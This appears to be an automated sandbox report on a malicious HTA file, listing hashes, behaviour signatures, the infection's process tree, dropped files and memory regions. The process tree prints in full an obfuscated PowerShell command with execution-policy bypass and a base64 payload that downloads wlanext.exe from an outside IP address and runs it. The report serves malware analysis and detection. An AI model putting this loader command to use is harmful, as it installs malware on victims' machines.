Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-10-2024 06:06

General

  • Target

    greatthingswithgreatideasgivenmerestthignstgood.hta

  • Size

    130KB

  • MD5

    b507badbce69dc67d803b7f3b1385036

  • SHA1

    b15c7634732a783b64414505ac4a5c095405f886

  • SHA256

    80b9bfa671f8626c76da94f0f39a03987278bd32e40851068a399bc69a4e05ca

  • SHA512

    a844a487906193c9265b67d7f3b1b617de3f227c205e043a1238cca7dbb9c1782480b001bd68de97cc86597e13205466bd433771b681d9b64bb4404f67f1abd3

  • SSDEEP

    96:Eam7xBVS9Mrv6VS9qrvpDCFl/Aoy58VS9sVS9QSrvdVS967T:Ea2xBQ9Gv6Q9wvaoiQ9sQ9QIvdQ9QT

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithgreatideasgivenmerestthignstgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3564
    • C:\Windows\SysWOW64\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe
      "C:\Windows\SystEM32\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe" "pOwERsHell.eXe -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt ; ieX($(IEX('[syStem.teXt.encoDiNG]'+[ChAr]0X3A+[chAr]58+'UTf8.geTSTriNG([SysteM.cOnVeRt]'+[ChaR]0X3a+[cHAR]58+'FRoMbasE64STRiNg('+[CHaR]34+'JFNUVUdrR1YgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyRGVGaW5pdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbXBULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV01mQlhnZEssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1V0bW1tZ1lxb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreUh1S0wpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia0pUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FU1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTVFVHa0dWOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTcwL3dsYW5leHQuZXhlIiwiJGVudjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUYVJ0LXNMZWVQKDMpO3N0QXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[char]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5048
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3696
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luwjyflo\luwjyflo.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3540
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CD3.tmp" "c:\Users\Admin\AppData\Local\Temp\luwjyflo\CSC4B235646806A45B095E8FFE49E519249.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1872
      • C:\Users\Admin\AppData\Roaming\wlanext.exe
        "C:\Users\Admin\AppData\Roaming\wlanext.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2356
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\wlanext.exe"
          4⤵
            PID:5056
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 752
            4⤵
            • Program crash
            PID:3612
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2356 -ip 2356
      1⤵
        PID:4728

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWershEll.EXe.log

        Filesize

        2KB

        MD5

        968cb9309758126772781b83adb8a28f

        SHA1

        8da30e71accf186b2ba11da1797cf67f8f78b47c

        SHA256

        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

        SHA512

        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        a564e2d35bb441c570dcee5ebbbcc4be

        SHA1

        5225b8d99c4fae81f2249f7e5906f428e9b4ce60

        SHA256

        e7235db1db682e1e8e9381ad5c2445da4abffe6fe785c06deff9e8f39688cbfc

        SHA512

        614792ccf09aaa14ce2e3ec5c1a90c06c0c0f485779db96094258b2888c5201bcf5b9b8d3bd0297133c774be7db5fa071543b1c41a10b67e680505dd6be470e6

      • C:\Users\Admin\AppData\Local\Temp\RES6CD3.tmp

        Filesize

        1KB

        MD5

        0b00b2fa7c48371d8a690584bbed2ff3

        SHA1

        263e0b7c9bd7c8606217aa1f2a2db6e89450e85f

        SHA256

        28d190d461945a1707f494e2346a39f5992d999bd1616e0cdd3f5f1a1c30664f

        SHA512

        e2bd747806c610fa0cec3dca09503a716c74152521e2e1fab99dc9b89647bf19549c7fe4c1e30d773c490cba79b3e362f44fd78c38cc1738a59957f8e01929b7

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vii2e2nn.1dv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\luwjyflo\luwjyflo.dll

        Filesize

        3KB

        MD5

        aac5f02fc411c73c3f186cae05fe35c9

        SHA1

        786a76dd57ce49718a80eb11e160d9c8ba621db3

        SHA256

        be3ef8ca5d36078deef6ad5828f05902b7dcccbc46f2a95fe45fd6fa0771b846

        SHA512

        680f1252f59d864adc444d6225083476bde3a7da062b99bece9eceb9db38c4c9be5060d80eaf2b3429642743a561ed4449bbf39e44ebcff97c9373e6703bf949

      • C:\Users\Admin\AppData\Roaming\wlanext.exe

        Filesize

        921KB

        MD5

        a019a791761f4d9afb7320f65bb6d925

        SHA1

        ce010189dfcf3a620732522aa44404f2fbc6a9f4

        SHA256

        3648d3be908fd29aa493de57b767ba8c192f703ae416624b6b722733928cb5aa

        SHA512

        f81cace2ed94a84899f5812a4e3bde6149f393dde6eba4d1fb06b1493af20114dd05e6cdbef98bfe960b6643d8814bc66345ee76b755b102edfabf436f5cf4a6

      • \??\c:\Users\Admin\AppData\Local\Temp\luwjyflo\CSC4B235646806A45B095E8FFE49E519249.TMP

        Filesize

        652B

        MD5

        6182bbe6589350ff303b4da9b16f850e

        SHA1

        7bfccbc746822373e4449f8ccaf8c401adc48273

        SHA256

        fc101d03db6b880e9e3de07b58a15c8fdbb500b666faafe0532b1661fb84e72a

        SHA512

        13d8243e49369b7da0faa2298903f2b983adcce654b8458968bf419178359fdcba503bdf13eca4d222b55014abdc6f679eabaf79430be8885408a397d8093178

      • \??\c:\Users\Admin\AppData\Local\Temp\luwjyflo\luwjyflo.0.cs

        Filesize

        467B

        MD5

        bebfacc2d07a38d08e81ee839f88d2e7

        SHA1

        8330fe9e223ac4d1084c4518273c8c68f4edfcd6

        SHA256

        c1be21408fe017c39fccef19dcd8c332c6985209103fc5a0682b7780aaf34e1d

        SHA512

        6d645019b48739f665ec479e237c4f64a9e42bda04ad0df0b458e168e762f44740bca8782e70767207c5e327c5d6d206b56e1c3789c45ca592332251aab8b8cf

      • \??\c:\Users\Admin\AppData\Local\Temp\luwjyflo\luwjyflo.cmdline

        Filesize

        369B

        MD5

        a408c4ca5570eb83fc15f1335cffd3d0

        SHA1

        7406a27d5a3f6eebfacdaee58e9d39963ba03517

        SHA256

        7d7fb20f205a299ef4f3cd527994b1b95b2974922c37f3dd3828642d8a79bac2

        SHA512

        b924fb444674ab9bd064ef773f02e9b4676d4b74f2475f19422c5f7ecfdd7b697fec8ca1d85e5e2cd7d591982c1682bb08aa875d58bd606b6f69bdb3ab99a513

      • memory/3696-44-0x00000000070D0000-0x00000000070DA000-memory.dmp

        Filesize

        40KB

      • memory/3696-50-0x0000000007380000-0x0000000007388000-memory.dmp

        Filesize

        32KB

      • memory/3696-49-0x00000000073A0000-0x00000000073BA000-memory.dmp

        Filesize

        104KB

      • memory/3696-29-0x0000000006310000-0x0000000006342000-memory.dmp

        Filesize

        200KB

      • memory/3696-30-0x000000006DCB0000-0x000000006DCFC000-memory.dmp

        Filesize

        304KB

      • memory/3696-40-0x00000000062F0000-0x000000000630E000-memory.dmp

        Filesize

        120KB

      • memory/3696-41-0x0000000006F10000-0x0000000006FB3000-memory.dmp

        Filesize

        652KB

      • memory/3696-42-0x00000000076B0000-0x0000000007D2A000-memory.dmp

        Filesize

        6.5MB

      • memory/3696-43-0x0000000007060000-0x000000000707A000-memory.dmp

        Filesize

        104KB

      • memory/3696-48-0x00000000072A0000-0x00000000072B4000-memory.dmp

        Filesize

        80KB

      • memory/3696-45-0x00000000072E0000-0x0000000007376000-memory.dmp

        Filesize

        600KB

      • memory/3696-46-0x0000000007260000-0x0000000007271000-memory.dmp

        Filesize

        68KB

      • memory/3696-47-0x0000000007290000-0x000000000729E000-memory.dmp

        Filesize

        56KB

      • memory/5048-65-0x00000000062A0000-0x00000000062A8000-memory.dmp

        Filesize

        32KB

      • memory/5048-7-0x0000000004F20000-0x0000000004F86000-memory.dmp

        Filesize

        408KB

      • memory/5048-0-0x00000000713FE000-0x00000000713FF000-memory.dmp

        Filesize

        4KB

      • memory/5048-17-0x00000000057A0000-0x0000000005AF4000-memory.dmp

        Filesize

        3.3MB

      • memory/5048-71-0x00000000713FE000-0x00000000713FF000-memory.dmp

        Filesize

        4KB

      • memory/5048-6-0x0000000004EB0000-0x0000000004F16000-memory.dmp

        Filesize

        408KB

      • memory/5048-5-0x0000000004E10000-0x0000000004E32000-memory.dmp

        Filesize

        136KB

      • memory/5048-72-0x00000000713F0000-0x0000000071BA0000-memory.dmp

        Filesize

        7.7MB

      • memory/5048-18-0x0000000005CE0000-0x0000000005CFE000-memory.dmp

        Filesize

        120KB

      • memory/5048-19-0x0000000005D90000-0x0000000005DDC000-memory.dmp

        Filesize

        304KB

      • memory/5048-4-0x00000000713F0000-0x0000000071BA0000-memory.dmp

        Filesize

        7.7MB

      • memory/5048-73-0x00000000070C0000-0x00000000070E2000-memory.dmp

        Filesize

        136KB

      • memory/5048-74-0x0000000007F70000-0x0000000008514000-memory.dmp

        Filesize

        5.6MB

      • memory/5048-2-0x0000000005020000-0x0000000005648000-memory.dmp

        Filesize

        6.2MB

      • memory/5048-3-0x00000000713F0000-0x0000000071BA0000-memory.dmp

        Filesize

        7.7MB

      • memory/5048-1-0x00000000023A0000-0x00000000023D6000-memory.dmp

        Filesize

        216KB

      • memory/5048-88-0x00000000713F0000-0x0000000071BA0000-memory.dmp

        Filesize

        7.7MB